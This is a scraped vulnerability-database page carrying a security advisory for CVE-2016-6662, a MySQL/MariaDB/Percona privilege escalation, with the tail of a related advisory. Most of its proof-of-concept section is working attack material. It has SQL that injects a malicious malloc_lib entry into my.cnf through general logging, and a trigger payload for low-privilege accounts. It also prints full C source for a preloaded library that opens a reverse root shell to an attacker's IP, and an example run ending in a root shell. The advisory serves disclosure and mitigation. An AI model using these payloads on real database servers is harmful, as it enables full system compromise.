http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 01.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
    idSSV:92513
    last seen2017-11-19
    modified2016-11-02
    published2016-11-02
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-92513
    titleMySQL / MariaDB / PerconaDB elevation of privilege vulnerability, CVE-2016-6664)
  • bulletinFamilyexploit
    description- http://legalhackers.com - dawid (at) legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation (0day) 5.6.33 5.5.52 MySQL clones are also affected, including: MariaDB PerconaDB II. BACKGROUND ------------------------- "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." * http://www.mysql.com/products/ * http://www.mysql.com/why-mysql/ * http://db-engines.com/en/system/MySQL III. INTRODUCTION ------------------------- An independent research has revealed multiple severe MySQL vulnerabilities. This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662 which can allow attackers to (remotely) inject malicious settings into MySQL configuration files (my.cnf) leading to critical consequences. The vulnerability affects all MySQL servers in default configuration in all version branches (5.7, 5.6, and 5.5) including the latest versions, and could be exploited by both local and remote attackers. Both the authenticated access to MySQL database (via network connection or web interfaces such as phpMyAdmin) and SQL Injection could be used as exploitation vectors. As SQL Injection attacks are one of the most common issues in web applications, the CVE-2016-6662 vulnerabilty could put web applications at a critical risk in case of a successful SQL Injection attack. A successful exploitation could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running. Official patches for the vulnerability are not available at this time for Oracle MySQL server. The vulnerability can be exploited even if security modules SELinux and AppArmor are installed with default active policies for MySQL service on major Linux distributions. This advisory provides a Proof-Of-Concept MySQL exploit which demonstrates how Remote Root Code Execution could be achieved by attackers. IV. DESCRIPTION ------------------------- The default MySQL package comes with a mysqld_safe script which is used by many default installations/packages of MySQL as a wrapper to start the MySQL service process which can observed, for example, in case of the following fully-updated Debian system: ``` root@debian:~# lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 8.5 (jessie) Release: 8.5 Codename: jessie root@debian:~# dpkg -l | grep -i mysql-server ii mysql-server 5.5.50-0+deb8u1 ii mysql-server-5.5 5.5.50-0+deb8u1 ii mysql-server-core-5.5 5.5.50-0+deb8u1 ``` After starting MySQL (installed from packages provided in the default Debian repositories) by running root@debian:~# service mysql start or, alternatively: ``` root@debian:~# /etc/init.d/mysql start The MySQL server process tree looks as follows: root 14967 0.0 0.1 4340 1588 ? S 06:41 0:00 /bin/sh /usr/bin/mysqld_safe mysql 15314 1.2 4.7 558160 47736 ? Sl 06:41 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 ``` As can be seen, the mysqld_safe wrapper script is executed as root, whereas the main mysqld process drops its privileges to mysql user. The wrapper script has the following function : ----[ /usr/bin/mysqld_safe ]---- ``` [...] # set_malloc_lib LIB # - If LIB is empty, do nothing and return # - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib # then pkglibdir. tcmalloc is part of the Google perftools project. # - If LIB is an absolute path, assume it is a malloc shared library # # Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when # running mysqld. See ld.so for details. set_malloc_lib() { malloc_lib="$1" if [ "$malloc_lib" = tcmalloc ]; then pkglibdir=`get_mysql_config --variable=pkglibdir` malloc_lib= # This list is kept intentionally simple. Simply set --malloc-lib # to a full path if another location is desired. for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do for flavor in _minimal '' _and_profiler _debug; do tmp="$libdir/libtcmalloc$flavor.so" #log_notice "DEBUG: Checking for malloc lib '$tmp'" [ -r "$tmp" ] || continue malloc_lib="$tmp" break 2 done done [...] ``` which can be used to preload a shared library before starting the server. The library can be set with the following parameter: --malloc-lib=LIB This parameter can also be specified within a mysql config file (my.cnf) in a '[mysqld]' or '[mysqld_safe]' section. If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute arbitrary code with root privileges when MySQL service is restarted (manually, via a system update, package update, system reboot etc.) In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that allowed users to create mysql config files with a simple statement: ``` SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf' ``` The issue was fixed by refusing to load config files with world-writable permissions as these are the default permissions applied to files created by OUTFILE query. As an additional protection, OUTFILE/DUMPFILE statements are prohibited from overwrite existing files. This protects existing configuration files. The old vulnerability has been considered fixed ever since the MySQL 3.23.55 was released in 2003, and writing to configuration files has been considered impossible. However, the V. PROOF OF CONCEPT section below will show that it is possible to successfully bypass current restrictions by abusing MySQL logging functions (available in every MySQL install by default) to achieve the following: 1) Inject malicious configuration into existing MySQL configuration files on systems with weak/improper permissions (configs owned by/writable by mysql user). 2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permisions. 3) Attackers with only SELECT/FILE permissions can gain access to logging functions (normally only available to MySQL admin users) on all of the _default_ MySQL installations and thus be in position to add/modify MySQL config files. V. PROOF OF CONCEPT ------------------------- 1) Inject malicious configuration into existing MySQL configuration files on systems with weak/improper permissions (configs owned by/writable by mysql user). ~~~~~~~~~~~~~~~~~~~~~~~~~ MySQL configuration files are loaded from all supported locations and processed one by one when mysqld_safe script is executed. Exact config locations depend on MySQL version. For example, as described on: http://dev.mysql.com/doc/refman/5.5/en/option-files.html for MySQL 5.5 the config locations include: /etc/my.cnf Global options /etc/mysql/my.cnf Global options SYSCONFDIR/my.cnf Global options $MYSQL_HOME/my.cnf Server-specific options defaults-extra-file The file specified with --defaults-extra-file=file_name, if any ~/.my.cnf User-specific options There is a common misconception that mysql config files should be owned by mysql user for the server to work properly. Many installation guides, or even security guides often wrongly advise users to set the ownership of mysql config files/directories such as /etc/mysql or /etc/my.cnf to mysql user. For example: https://github.com/willfong/mariadb-backup/blob/master/README.md says: "Lock down permissions on config file(s) chown mysql /etc/my.cnf chmod 600 /etc/my.cnf" Whereas the article at: http://www.devshed.com/c/a/mysql/security-issues-with-mysql/ mentions: "You should also protect the global option file, /etc/my.cnf, if it exists. The mysql user should own it and have read/write access to it, but other users need only read access: shell> chown mysql /etc/my.cnf" Moreover, there are also MySQL recipes for installation automatation software such as Chef that also provide users with vulnerable permissions on my.cnf config files. If any of the MySQL config files is owned by mysql user, an attacker could append malicious config entries to it as follows: root@debian:~/# ls -l /etc/my.cnf -rw-r--r-- 1 mysql mysql 72 Jul 28 17:20 /etc/my.cnf root@debian:~/# cat /etc/my.cnf [mysqld] key_buffer = 16M max_allowed_packet = 16M Attacker could run the following SQL queries: ``` mysql> set global general_log_file = '/etc/my.cnf'; mysql> set global general_log = on; mysql> select ' '> '> ; injected config entry '> '> [mysqld] '> malloc_lib=/tmp/mysql_exploit_lib.so '> '> [separator] '> '> '; 1 row in set (0.00 sec) mysql> set global general_log = off; The resulting config would then have the following part appended: root@debian:~/# cat /etc/my.cnf [mysqld] key_buffer = 16M max_allowed_packet = 16M /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock Time Id Command Argument 160728 17:25:14 40 Query select ' ; injected config entry [mysqld] malloc_lib=/tmp/mysql_exploit_lib.so [separator] ' 160728 17:25:15 40 Query set global general_log = off ``` This config contains some redundant information that would normally cause MySQL to fail to startup during a restart due to parsing issues. However, the important part is that the config now contains the section: [mysqld] malloc_lib=/tmp/mysql_exploit_lib.so mysqld_safe will read the shared library path correctly and add it to the LD_PRELOAD environment variable before the startup of mysqld daemon. The preloaded library can then hook the libc fopen() calls and clean up the config before it is ever processed by mysqld daemon in order for it to start up successfully. ~~~~~~~~~~~~~~~~~~~~~~~~~ 2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permisions. Analysis of the mysqld_safe script has shown that in addition to the config locations provided above, mysqld_safe also loads the configuration file from the mysql data directory (/var/lib/mysql/my.cnf) by default as can be seen below: ----[ /usr/bin/mysqld_safe ]---- ``` [...] # Try where the binary installs put it if test -d $MY_BASEDIR_VERSION/data/mysql then DATADIR=$MY_BASEDIR_VERSION/data if test -z "$defaults" -a -r "$DATADIR/my.cnf" then defaults="--defaults-extra-file=$DATADIR/my.cnf" fi [...] ----------[ eof ]--------------- ``` on MySQL versions in branches 5.5 and 5.6. The datadir location for my.cnf has only been removed from MySQL starting from 5.7 branch however in many configurations it will still load config from: /var/lib/mysql/.my.cnf The data directory /var/lib/mysql is (obviously) writable by mysql user on every install: root@debian:~# ls -ld /var/lib/mysql/ drwx------ 4 mysql mysql 4096 Jul 28 06:41 /var/lib/mysql/ Therefore, if no mysql-owned configs are available on the system, an attacker could still be able to exploit the vulnerability by creating a config at the following locations: /var/lib/mysql/my.cnf /var/lib/mysql/.my.cnf As mentioned, using FILE permission to create such a file with the SQL statement: SELECT 'malicious config entry' INTO OUTFILE '/var/lib/mysql/my.cnf' would not work, as MySQL creates files with rw permissions for the world: -rw-rw-rw- 1 mysql mysql 4 Jul 28 07:46 /var/lib/mysql/my.cnf and MySQL would prevent such world-writable config from being loaded at startup. ``` Attackers could bypass this however by using these logging SQL statements: mysql> set global general_log_file = '/var/lib/mysql/my.cnf'; mysql> set global general_log = on; mysql> select ' '> '> ; injected config entry '> '> [mysqld] '> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so '> '> [separator] '> '> '; 1 row in set (0.00 sec) mysql> set global general_log = off; The queries will create the my.cnf file with the necessary permissions (without o-w bit) for it to be parsed by the MySQL daemon: # ls -l /var/lib/mysql/my.cnf -rw-rw---- 1 mysql mysql 352 Jul 28 17:48 /var/lib/mysql/my.cnf The file will have the following contents: # cat /var/lib/mysql/my.cnf /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock Time Id Command Argument 160728 17:48:22 43 Query select ' ; injected config entry [mysqld] malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so [separator] ' 160728 17:48:23 43 Query set global general_log = off ``` One problem will remain however. MySQL will refuse files that do not start with a valid [section] header with the message: error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1 Fatal error in defaults handling. Program aborted Further testing has however proved that it is possible to bypass this security restriction as well but these will not be included in this advisory for the time being. It is worth to note that attackers could use one of the other vulnerabilities discovered by the author of this advisory which has been assigned a CVEID of CVE-2016-6663 and is pending disclosure. The undisclosed vulnerability makes it easy for certain attackers to create /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. ~~~~~~~~~~~~~~~~~~~~~~~~~ 3) Attackers with only SELECT/FILE permissions can gain access to logging functions (normally only available to MySQL admin users) on all of the _default_ MySQL installations and thus be in position to add/modify MySQL config files. If attackers do not have administrative rights required to access logging settings and only have standard user privileges with the addition of FILE privilege then they could still gain the ability to write to / modify configuration files. This could be achieved by writing a malicious trigger payload: ``` CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf AFTER INSERT ON `active_table` FOR EACH ROW BEGIN DECLARE void varchar(550); set global general_log_file='/var/lib/mysql/my.cnf'; set global general_log = on; select " [mysqld] malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' " INTO void; set global general_log = off; END; into a trigger file of an actively used table ('active_table') with the use of a statement similar to: SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' Such trigger will be loaded when tables get flushed. From this point on whenever an INSERT statement is invoked on the table, e.g: INSERT INTO `active_table` VALUES('xyz'); ``` The trigger's code will be executed with mysql root user privileges (see 'definer' above) and will thus let attacker to modify the general_log settings despite the lack of administrative privileges on their standard account. ------------------ VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit ----------[ 0ldSQL_MySQL_RCE_exploit.py ]-------------- --------------------------------------------------- ----------[ mysql_hookandroot_lib.c ]-------------- ``` /* (CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit mysql_hookandroot_lib.c This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit. The library is meant to be loaded by mysqld_safe on mysqld daemon startup to create a reverse shell that connects back to the attacker's host on 6603 port (mysql port in reverse ;) and provides a root shell on the target. mysqld_safe will load this library through the following setting: [mysqld] malloc_lib=mysql_hookandroot_lib.so in one of the my.cnf config files (e.g. /etc/my.cnf). This shared library will hook the execvp() function which is called during the startup of mysqld process. It will then fork a reverse shell and clean up the poisoned my.cnf file in order to let mysqld run as normal so that: 'service mysql restart' will work without a problem. Before compiling adjust IP / PORT and config path. ~~ Discovered/Coded by: Dawid Golunski http://legalhackers.com ~~ Compilation (remember to choose settings compatible with the remote OS/arch): gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl Disclaimer: For testing purposes only. Do no harm. Full advisory URL: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt */ #define _GNU_SOURCE #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <string.h> #include <dlfcn.h> #include <stdlib.h> #include <stdarg.h> #include <fcntl.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define ATTACKERS_IP "127.0.0.1" #define SHELL_PORT 6033 #define INJECTED_CONF "/var/lib/mysql/my.cnf" char* env_list[] = { "HOME=/root", NULL }; typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]); static execvp_func_t old_execvp = NULL; // fork & send a bash shell to the attacker before starting mysqld void reverse_shell(void) { int i; int sockfd; //socklen_t socklen; struct sockaddr_in srv_addr; srv_addr.sin_family = AF_INET; srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip // create new TCP socket && connect sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); for(i = 0; i <= 2; i++) dup2(sockfd, i); execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list ); exit(0); } /* cleanup injected data from the target config before it is read by mysqld in order to ensure clean startup of the service The injection (if done via logging) will start with a line like this: /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: */ int config_cleanup() { FILE *conf; char buffer[2000]; long cut_offset=0; conf = fopen(INJECTED_CONF, "r+"); if (!conf) return 1; while (!feof(conf)) { fgets(buffer, sizeof(buffer), conf); if (strstr(buffer,"/usr/sbin/mysqld, Version")) { cut_offset = (ftell(conf) - strlen(buffer)); } } if (cut_offset>0) ftruncate(fileno(conf), cut_offset); fclose(conf); return 0; } // execvp() hook int execvp(const char* filename, char* const argv[]) { pid_t pid; int fd; // Simple root PoC (touch /root/root_via_mysql) fd = open("/root/root_via_mysql", O_CREAT); close(fd); old_execvp = dlsym(RTLD_NEXT, "execvp"); // Fork a reverse shell and execute the original execvp() function pid = fork(); if (pid == 0) reverse_shell(); // clean injected payload before mysqld is started config_cleanup(); return old_execvp(filename, argv); } ``` Replication / testing: ~~~~~~~~~~~~~~~~~~ As admin on the target system: ~~~~~~~~ 1. Set up a test database account/permissions: CREATE DATABASE pocdb; GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!'; GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'; 2. Simulate write access on any of available mysql configs. It just needs to be a valid/parsable config with section e.g: ``` [isamchk] key_buffer = 16M For example, /etc/mysql/my.cnf on Debian: # chown mysql:mysql /etc/mysql/my.cnf # ls -l /etc/mysql/my.cnf -rw-r--r-- 1 mysql mysql 3534 Sep 11 02:15 /etc/mysql/my.cnf ``` 3. Run the exploit as the attacker and restart mysql when exploit is done. As attacker: ~~~~~~~~ ``` 1. Enter your library path in mysql_hookandroot_lib.c src. 2. Run the 0ldSQL_MySQL_RCE_exploit.py script. ``` Example run: ~~~~~~~~ ``` attacker$ ./0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass 'p0cpass!' -dbhost 192.168.1.10 -dbname pocdb -mycnf /etc/mysql/my.cnf 0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) (CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Connecting to target server 192.168.1.10 and target mysql account '[email protected]' using DB 'pocdb' [+] The account in use has the following grants/perms: GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD <secret> GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%' [+] Compiling mysql_hookandroot_lib.so [+] Converting mysql_hookandroot_lib.so into HEX [+] Saving trigger payload into /var/lib/mysql/pocdb/poctable.TRG [+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target [+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded [+] Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config /etc/mysql/my.cnf [+] Showing the contents of /etc/mysql/my.cnf config to verify that our setting (malloc_lib) got injected [mysql] #no-auto-rehash # faster start of mysql but no tab completition [isamchk] key_buffer = 16M !includedir /etc/mysql/conf.d/ /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock Time Id Command Argument 160912 8:48:41 44 Query select " # 0ldSQL_MySQL_RCE_exploit got here :) [mysqld] malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' [abyss] " INTO void 44 Query SET global general_log = off [+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :) [+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :) listening on [any] 6033 ... connect to [192.168.1.20] from dbserver [192.168.1.10] 36932 bash: cannot set terminal process group (963): Inappropriate ioctl for device bash: no job control in this shell root@debian:/# id id uid=0(root) gid=0(root) groups=0(root) root@debian:/# ls -l /root/root_via_mysql ---------- 1 root root 0 Sep 10 22:50 /root/root_via_mysql root@debian:/# exit exit exit [+] Shell closed. Hope you had fun. [+] Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;) [+] Exiting (code: 0) ``` VII. BUSINESS IMPACT ------------------------- As discussed above the vulnerability could be exploited by attackers with both privileged and unprivileged (with FILE privilege only) access to mysql accounts. It could also be combined with CVE-2016-6663 vulnerability which will be released shortly and could allow certain attackers to escalate their privileges to root even without FILE privilege. The vulnerability could also be exploited via an SQL injection vector, which removes the need for the attackers to have direct mysql connection and increases the risk of exploitation. Successful exploitation could gain a attacker a remote shell with root privileges which would allow them to fully compromise the remote system. If exploited, the malicious code would run as soon as MySQL daemon gets restarted. MySQL service restart could happen for a number of reasons. VIII. SYSTEMS AFFECTED ------------------------- All MySQL versions from the oldest versions to the latest shown at the beginnig of this advisory. Some systems run MySQL via Systemd and provide direct startup path to mysqld daemon instead of using mysqld_safe wrapper script. These systems however are also at risk as mysqld_safe may be called on update by the installation scripts or some other system services. Because the exploit only accesses files normally used by MySQL server ( such as the config), and the injected library is preloaded by mysqld_safe startup scripta not included within the default policies, the vulnerability can be exploited even if security modules as SELinux and AppArmor are installed with active security policies for the MySQL daemon. IX. VENDOR RESPONSE / SOLUTION ------------------------- The vulnerability was reported to Oracle on 29th of July 2016 and triaged by the security team. It was also reported to the other affected vendors including PerconaDB and MariaDB. The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of 30th of August. During the course of the patching by these vendors the patches went into public repositories and the fixed security issues were also mentioned in the new releases which could be noticed by malicious attackers. As over 40 days have passed since reporting the issues and patches were already mentioned publicly, a decision was made to start disclosing vulnerabilities (with limited PoC) to inform users about the risks before the vendor's next CPU update that only happens at the end of October. No official patches or mitigations are available at this time from the vendor. As temporary mitigations, users should ensure that no mysql config files are owned by mysql user, and create root-owned dummy my.cnf files that are not in use. These are by no means a complete solution and users should apply official vendor patches as soon as they become available. X. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Source codes from the advisory: http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py http://legalhackers.com/exploits/mysql_hookandroot_lib.c https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662 The old vulnerability fixed in MySQL version 3.23.55: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0150 XI. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XII. REVISION HISTORY ------------------------- 12.09.2016 - Advisory released publicly as 0day XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
    idSSV:92405
    last seen2017-11-19
    modified2016-09-13
    published2016-09-13
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-92405
    titleMySQL <= 5.7.15 remote Root code execution vulnerability

The Hacker News

References